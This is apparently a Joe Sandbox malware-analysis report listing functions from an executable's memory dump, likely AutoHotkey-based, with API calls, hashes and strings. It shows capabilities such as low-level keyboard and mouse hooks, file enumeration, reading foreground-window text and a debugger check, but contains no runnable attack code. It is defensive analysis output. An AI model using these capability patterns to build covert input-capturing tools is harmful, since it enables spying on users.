Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: AllocateH_prologHeap_malloc
String ID:
API String ID: 3218263244-0
Opcode ID: 6fb9b89d0fca6338282aa98c116106cd01afac0a86ea91166c4685a27bd691f8
Instruction ID: 7515139eb6e005811b27035cfefb3eed34b0604cad49f67dbdfe729d3d46cb4c
Opcode Fuzzy Hash: 6fb9b89d0fca6338282aa98c116106cd01afac0a86ea91166c4685a27bd691f8
Instruction Fuzzy Hash: 1A218DB48572409BD341DF5AA88566ABFA0F769338F90827FD118973A1CBB88444CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0049FF6C, Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,0047E61E,00000000,?,0049E85B,004011D4,0047E61E,00000000,00000000,00000000,?,0049C414,00000001,00000214,?,0049D9F0), ref: 0049FFAF

Part of subcall function 0049C9A2: __getptd_noexit.LIBCMT ref: 0049C9A2

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: b47d6fd274576b1314829e5dfbb09a9ff42cbadfc258b5736f83f76971318a0e
Instruction ID: 44fba749607cebc3cb768d942e1eec12a5c8b45b7b2eee97799391049c57de62
Opcode Fuzzy Hash: b47d6fd274576b1314829e5dfbb09a9ff42cbadfc258b5736f83f76971318a0e
Instruction Fuzzy Hash: 6801D4312116169EEF289F25DC84B6B3F58AF82768F00453BF80ACB6D4CB38D844C688

Uniqueness

Uniqueness Score: -1.00%

Function 0047BE50, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0047BE5D

Part of subcall function 0049853E: __FF_MSGBANNER.LIBCMT ref: 00498557
Part of subcall function 0049853E: __NMSG_WRITE.LIBCMT ref: 0049855E
Part of subcall function 0049853E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0049E811,004011D4,00000001,004011D4,?,0049D07D,00000018,004CE9B0,0000000C,0049D10D), ref: 00498583

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: cffe1467e0f115966d5cdff285243f0c82cdde54bd3c59ca9e2e27b7d4deebe7
Instruction ID: 6729d72069637157612124dbb416f6cef28ddbd7ff3cf3db686fea960b590c95
Opcode Fuzzy Hash: cffe1467e0f115966d5cdff285243f0c82cdde54bd3c59ca9e2e27b7d4deebe7
Instruction Fuzzy Hash: B9F05E716006028FDB64CB29E890B6BB3E6FB90314B54C52ED44E83B54E734E845CA44

Uniqueness

Uniqueness Score: -1.00%

Function 0047B7B0, Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 00498C86: _malloc.LIBCMT ref: 00498CA0

_malloc.LIBCMT ref: 0047B7CD

Part of subcall function 0049853E: __FF_MSGBANNER.LIBCMT ref: 00498557
Part of subcall function 0049853E: __NMSG_WRITE.LIBCMT ref: 0049855E
Part of subcall function 0049853E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0049E811,004011D4,00000001,004011D4,?,0049D07D,00000018,004CE9B0,0000000C,0049D10D), ref: 00498583

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: _malloc$AllocateHeap
String ID:
API String ID: 680241177-0
Opcode ID: 0b65a792f475e41add5e85dfa6b43b56f200c03b92b3ebc7e157a611633829c8
Instruction ID: a1734069c662139ed388a5c6cc8b0d5655a5b5a76106219f41ab1ec136b18426
Opcode Fuzzy Hash: 0b65a792f475e41add5e85dfa6b43b56f200c03b92b3ebc7e157a611633829c8
Instruction Fuzzy Hash: F5E09BB190672147D7605F29BC017977BD0AF00764F05843FF88986301EB78D48487C6

Uniqueness

Uniqueness Score: -1.00%

Function 0047CBB0, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0047CBCE

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 07d06d6e3e3d5be67576a53a91a18bf6dde8067cc8a80042bf547eb80315756a
Instruction ID: 577a9936bbd06867af24c187de3073c0fa4c88b752d2e693bf7e3d3f17b2739c
Opcode Fuzzy Hash: 07d06d6e3e3d5be67576a53a91a18bf6dde8067cc8a80042bf547eb80315756a
Instruction Fuzzy Hash: CAD067B5219200AFD244DF48D984F6BB7ECEB98711F10890DF599C3240C730D905CB66

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0041D130, Relevance: 51.0, APIs: 27, Strings: 2, Instructions: 264windowcomclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0040DE90: CreateThread.KERNEL32(00000000,00002000,0040E1C0,00000000,00000000,004D6600), ref: 0040DEEA
Part of subcall function 0040DE90: SetThreadPriority.KERNEL32(00000000,0000000F,?,00408928,?,00408545,An internal error has occurred in the debugger engine.Continue running the script without the debugger?,?,00000001,00406035,?,?,00000001), ref: 0040DF00
Part of subcall function 0040DE90: PostThreadMessageW.USER32 ref: 0040DF24
Part of subcall function 0040DE90: Sleep.KERNEL32(0000000A,?,00408928,?,00408545,An internal error has occurred in the debugger engine.Continue running the script without the debugger?,?,00000001,00406035,?,?,00000001), ref: 0040DF30
Part of subcall function 0040DE90: GetTickCount.KERNEL32 ref: 0040DF47
Part of subcall function 0040DE90: PeekMessageW.USER32 ref: 0040DF6A

Shell_NotifyIconW.SHELL32(00000002,004D89A2), ref: 0041D179
IsWindow.USER32(00000000), ref: 0041D197
DestroyWindow.USER32(00000000,?,?,?,00000000,00000000), ref: 0041D1A4
DeleteObject.GDI32(?), ref: 0041D1B2
DeleteObject.GDI32(?), ref: 0041D1BC
DeleteObject.GDI32(?), ref: 0041D1C6
DeleteObject.GDI32(?), ref: 0041D1ED
DestroyIcon.USER32(?,?,?,?,?,00000000,00000000), ref: 0041D1F1
IsWindow.USER32(?), ref: 0041D1FB
DestroyWindow.USER32(?,?,?,?,?,00000000,00000000), ref: 0041D209
DeleteObject.GDI32(?), ref: 0041D217
DeleteObject.GDI32(?), ref: 0041D221
DeleteObject.GDI32(?), ref: 0041D22B
DeleteObject.GDI32(?), ref: 0041D282
DestroyIcon.USER32(00000000,?,?,?,?,00000000,00000000), ref: 0041D29D
DestroyIcon.USER32(00000000,?,?,?,?,00000000,00000000), ref: 0041D2A6
IsWindow.USER32(00000000), ref: 0041D2D7
DestroyWindow.USER32(00000000,?,?,?,00000000,00000000), ref: 0041D2E4
DeleteObject.GDI32(?), ref: 0041D2FF
ChangeClipboardChain.USER32(?,00000000,?,?,?,00000000,00000000), ref: 0041D346
mciSendStringW.WINMM(status AHK_PlayMe mode,?,00000208,00000000), ref: 0041D373
mciSendStringW.WINMM(close AHK_PlayMe,00000000,00000000,00000000), ref: 0041D388
DeleteCriticalSection.KERNEL32(004D65E8,?,?,?,00000000,00000000), ref: 0041D38F
OleUninitialize.OLE32(?,?,?,00000000,00000000), ref: 0041D395
_free.LIBCMT ref: 0041D3CB
_free.LIBCMT ref: 0041D407

Part of subcall function 004985DD: HeapFree.KERNEL32(00000000,00000000,?,0049C453,00000000,?,0049D9F0,?,0047E61E), ref: 004985F3
Part of subcall function 004985DD: GetLastError.KERNEL32(00000000,?,0049C453,00000000,?,0049D9F0,?,0047E61E), ref: 00498605

_free.LIBCMT ref: 0041D446

Strings

status AHK_PlayMe mode, xrefs: 0041D36E
close AHK_PlayMe, xrefs: 0041D383

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Delete$Object$DestroyWindow$Icon$Thread_free$MessageSendString$ChainChangeClipboardCountCreateCriticalErrorFreeHeapLastNotifyPeekPostPrioritySectionShell_SleepTickUninitialize
String ID: close AHK_PlayMe$status AHK_PlayMe mode
API String ID: 2490927285-1474590089
Opcode ID: 1e84fc806f23e5b89a175555e463d3bf039efc34f05f4fa1a8799e0c7ba146ab
Instruction ID: 162caac18da2a0f0f8d6e55618ac0aa38e01c22c27b9480cde0466bb133e19e0
Opcode Fuzzy Hash: 1e84fc806f23e5b89a175555e463d3bf039efc34f05f4fa1a8799e0c7ba146ab
Instruction Fuzzy Hash: CD917BB1E01211ABDB20DF69DC88B9777E8AB05714F04457BE855D3390EB38E885CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 004370C0, Relevance: 16.8, APIs: 11, Instructions: 293fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?), ref: 0043715E
FindNextFileW.KERNEL32(00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 00437185
FindClose.KERNEL32(00000000,00000000,?,?,?,?), ref: 00437215
FindNextFileW.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 00437252
FindClose.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,?,?), ref: 0043728B
FindFirstFileW.KERNEL32(?,?), ref: 004372B1
FindNextFileW.KERNEL32(00000000,?), ref: 004373EF
FindClose.KERNEL32(00000000,00000000,?,?,?,?), ref: 00437411
FindClose.KERNEL32(00000000,00000000,?,?,?,?), ref: 00437428
FindClose.KERNEL32(00000000), ref: 00437456

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Find$CloseFile$Next$First
String ID:
API String ID: 2539514441-0
Opcode ID: b403ba5438b9072e46fae82dae5ba4af7dbd1f2bd38d707f1ef1b7d22dba4f16
Instruction ID: 56407cc84792588a9a16d6b092892790b8cf45c5defd6a066ac8fb47902d916f
Opcode Fuzzy Hash: b403ba5438b9072e46fae82dae5ba4af7dbd1f2bd38d707f1ef1b7d22dba4f16
Instruction Fuzzy Hash: 3AB1CFB26083058BCB20DF64CC84AABB7E4EB8A314F04456EFD8597341D739ED45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00446070, Relevance: 15.2, APIs: 10, Instructions: 221windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 004460B8
GetForegroundWindow.USER32 ref: 004460E0
IsIconic.USER32 ref: 004460EF
GetWindowRect.USER32 ref: 00446107
ClientToScreen.USER32(?,?), ref: 00446135
WindowFromPoint.USER32(?,?), ref: 00446199
_memset.LIBCMT ref: 00446206
EnumChildWindows.USER32 ref: 00446229
GetClassNameW.USER32 ref: 0044627A
EnumChildWindows.USER32 ref: 0044629C

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Window$ChildEnumWindows$ClassClientCursorForegroundFromIconicNamePointRectScreen_memset
String ID:
API String ID: 2861960800-0
Opcode ID: 74263b0eb0f3e97179cb5c131d55b3e9a5e7386ba9a6948aa9340af0f558fbd2
Instruction ID: 0de9339a583adcf31e5afe3a109d5d4f38653f308ab06659f1a49fe71bc829bc
Opcode Fuzzy Hash: 74263b0eb0f3e97179cb5c131d55b3e9a5e7386ba9a6948aa9340af0f558fbd2
Instruction Fuzzy Hash: 8871C2716083019BE310DF69D881B6BB7E9ABC5714F044A2FF98487341DB79DD44CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0045D2E0, Relevance: 12.3, APIs: 8, Instructions: 317comfileCOMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 0045D3C8
_wcschr.LIBCMT ref: 0045D3DA
GetFileAttributesW.KERNEL32(?), ref: 0045D3EA
FindFirstFileW.KERNEL32(?,?), ref: 0045D406
FindClose.KERNEL32(00000000), ref: 0045D416
CoInitialize.OLE32(00000000), ref: 0045D41E
CoCreateInstance.OLE32(004AC820,00000000,00000001,004AC810,?), ref: 0045D437
CoUninitialize.OLE32 ref: 0045D5FB

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: FileFind_wcschr$AttributesCloseCreateFirstInitializeInstanceUninitialize
String ID:
API String ID: 1700229770-0
Opcode ID: 9fd1649a6d4d632a7964adb3679a44febcaaddb00a87bd87ff30d8fd21dd8cef
Instruction ID: ffe7a32af82595d10bd3fc2b9d6ad7f4c3bb39e484a619a372f0425c74b34765
Opcode Fuzzy Hash: 9fd1649a6d4d632a7964adb3679a44febcaaddb00a87bd87ff30d8fd21dd8cef
Instruction Fuzzy Hash: 9BB1BC71704301ABD624EF58CC81F6B73AAAFC9B14F10461EF9648B2D1D778E849CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00445220, Relevance: 12.1, APIs: 8, Instructions: 107windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000000C,00000000,00000001), ref: 004452E2
IsWindowVisible.USER32(?), ref: 004452EB
ShowWindow.USER32(?,00000005,?,?,?,00444B06), ref: 00445304
IsIconic.USER32 ref: 0044530C
ShowWindow.USER32(?,00000009,?,?,?,00444B06), ref: 0044531F
GetForegroundWindow.USER32(?,?,?,00444B06), ref: 00445321
SetForegroundWindow.USER32(?,?,?,?,00444B06), ref: 00445332
SendMessageW.USER32(?,000000B6,00000000,000F423F), ref: 0044535D

Part of subcall function 0043A3A0: GetForegroundWindow.USER32(745DBB20,?,?,00000001), ref: 0043A3AA
Part of subcall function 0043A3A0: GetWindowTextW.USER32 ref: 0043A3BF
Part of subcall function 0043A3A0: _wcsncpy.LIBCMT ref: 0043A466

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Window$Foreground$MessageSendShow$IconicTextVisible_wcsncpy
String ID:
API String ID: 3350946471-0
Opcode ID: 031b5418b139919b1cf96ef088ef0931688e8961c9491f7b1ab67d824d433b47
Instruction ID: aafd276092f0de434b8bfd06e616a91fe6a3d8fc6d23bd65856b7b8b0fe7add0
Opcode Fuzzy Hash: 031b5418b139919b1cf96ef088ef0931688e8961c9491f7b1ab67d824d433b47
Instruction Fuzzy Hash: 2331077154AA11ABEA10EF64EC80B6BB365BB45750F41847BF81187252F7B9EC048F8E

Uniqueness

Uniqueness Score: -1.00%

Function 0040E1C0, Relevance: 9.1, APIs: 6, Instructions: 113windowthreadCOMMON

Download Yara Rule

APIs

GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0040E1EB
SetWindowsHookExW.USER32(0000000D,Function_000099D0,?,00000000), ref: 0040E253
UnhookWindowsHookEx.USER32(?), ref: 0040E26C
SetWindowsHookExW.USER32(0000000E,Function_00009B40,?,00000000), ref: 0040E2AF
UnhookWindowsHookEx.USER32(?), ref: 0040E2C3
PostThreadMessageW.USER32 ref: 0040E2F0

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: HookWindows$MessageUnhook$PostThread
String ID:
API String ID: 378849449-0
Opcode ID: 6e00a351ad540c531a8383628aef85335037b48d1d8ea0b97de26b7e0d959bb0
Instruction ID: 3b666c166112556cb1d9482ce374fea5df7f236df81af5af297258d19bf0ebae
Opcode Fuzzy Hash: 6e00a351ad540c531a8383628aef85335037b48d1d8ea0b97de26b7e0d959bb0
Instruction Fuzzy Hash: 1C31F1306483019AEB209B7A9C49B277BDC9718344F140C7FF700A63E1E6B9D964CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 004A01D7, Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 004A604A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004A605F
UnhandledExceptionFilter.KERNEL32(004AE8B4), ref: 004A606A
GetCurrentProcess.KERNEL32(C0000409), ref: 004A6086
TerminateProcess.KERNEL32(00000000), ref: 004A608D

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 750267b2b659817289366fc39dc582cc4f7e70b22af312127465817daa6f9feb
Instruction ID: 38b64f9460635c0cb8b2f4bb57847d382f8ab4f84cca394c75d00fef1501ad8e
Opcode Fuzzy Hash: 750267b2b659817289366fc39dc582cc4f7e70b22af312127465817daa6f9feb
Instruction Fuzzy Hash: 6821CEB5906A04DFD740EF25ED896587BB5FB29305F90407FE8088B3A0EBB459818F0E

Uniqueness

Uniqueness Score: -1.00%

Function 00449020, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00449051
DeviceIoControl.KERNEL32(00000000,002D4804,?,00000001,00000000,00000000,?,00000000), ref: 0044908E
CloseHandle.KERNEL32(00000000), ref: 00449097

Strings

\\.\%c:, xrefs: 0044902F

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID: \\.\%c:
API String ID: 33631002-1260769427
Opcode ID: 7c4aa3d2ecfa34d7fa209b419ae572729d72dd126433de458a84e517cc3407d6
Instruction ID: 366606176f6b9f38647191e4feecd98be79b0fd3ec39cf79c6e161224e8ddcb6
Opcode Fuzzy Hash: 7c4aa3d2ecfa34d7fa209b419ae572729d72dd126433de458a84e517cc3407d6
Instruction Fuzzy Hash: 97014E7264035076E320E7649C56FF73A986BC9B10F548A2EF790F91C0EDB49518C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0041B0E0, Relevance: 89.5, APIs: 26, Strings: 25, Instructions: 215COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0041B0F8
__wcsicoll.LIBCMT ref: 0041B110

Strings

ATan, xrefs: 0041B2BA
HTML, xrefs: 0041B13A
Log, xrefs: 0041B1B2
Pow, xrefs: 0041B16A
Sin, xrefs: 0041B242
Tan, xrefs: 0041B272
BitAnd, xrefs: 0041B2D2
Ceil, xrefs: 0041B1FA
BitOr, xrefs: 0041B2EA
Asc, xrefs: 0041B0F2
BitXOr, xrefs: 0041B302
Mod, xrefs: 0041B152
Sqrt, xrefs: 0041B19A
BitShiftLeft, xrefs: 0041B332
Cos, xrefs: 0041B25A
ASin, xrefs: 0041B28A
BitShiftRight, xrefs: 0041B34A
Deref, xrefs: 0041B122
Abs, xrefs: 0041B22A
Exp, xrefs: 0041B182
ACos, xrefs: 0041B2A2
Floor, xrefs: 0041B212
Chr, xrefs: 0041B10A
Round, xrefs: 0041B1E2
BitNot, xrefs: 0041B31A

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll
String ID: ACos$ASin$ATan$Abs$Asc$BitAnd$BitNot$BitOr$BitShiftLeft$BitShiftRight$BitXOr$Ceil$Chr$Cos$Deref$Exp$Floor$HTML$Log$Mod$Pow$Round$Sin$Sqrt$Tan
API String ID: 3832890014-879508146
Opcode ID: 89740b96c581b4a3f84165c5c4b21e6e268b39954564d48b41b8bd17e8751a2d
Instruction ID: d874470aac1def29f44c4623ff4e38d98ed1c772dc84a74aae8ac840844f3d44
Opcode Fuzzy Hash: 89740b96c581b4a3f84165c5c4b21e6e268b39954564d48b41b8bd17e8751a2d
Instruction Fuzzy Hash: BD513C15A41A1132EE21212E9D13BDF24499BE374BF85807AFC08C5382FB9D9B5991FE

Uniqueness

Uniqueness Score: -1.00%

Function 0041B370, Relevance: 84.2, APIs: 24, Strings: 24, Instructions: 199COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0041B388
__wcsicoll.LIBCMT ref: 0041B3A0

Strings

Icon, xrefs: 0041B54A
NoDefault, xrefs: 0041B4EA
Check, xrefs: 0041B3FA
Delete, xrefs: 0041B502
DeleteAll, xrefs: 0041B51A
Uncheck, xrefs: 0041B412
Tip, xrefs: 0041B532
Color, xrefs: 0041B4BA
Add, xrefs: 0041B3B2
Default, xrefs: 0041B4D2
Rename, xrefs: 0041B3CA
Standard, xrefs: 0041B48A
ToggleEnable, xrefs: 0041B472
Disable, xrefs: 0041B45A
NoStandard, xrefs: 0041B4A2
Click, xrefs: 0041B57A
MainWindow, xrefs: 0041B592
NoIcon, xrefs: 0041B562
Show, xrefs: 0041B382
Enable, xrefs: 0041B442
ToggleCheck, xrefs: 0041B42A
UseErrorLevel, xrefs: 0041B39A
Insert, xrefs: 0041B3E2
NoMainWindow, xrefs: 0041B5AA

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

